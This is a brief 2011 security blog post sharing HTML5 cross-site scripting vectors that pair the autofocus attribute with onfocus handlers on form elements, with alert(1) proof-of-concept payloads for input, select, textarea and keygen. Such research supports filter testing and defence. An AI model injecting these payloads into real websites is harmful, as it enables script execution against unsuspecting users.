Pages

Wednesday, March 16, 2011

HTML5 new XSS vectors

So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now. We have a brand new way of auto executing XSS.

Normally when you find a XSS hole within a input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

<input type="text" USER_INPUT> 

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

<input type="text" AUTOFOCUS onfocus=alert(1)> 

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with excess of tags. Any form based element it seems you can use this method:-

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

Reffered From The Spanner

No comments:

Post a Comment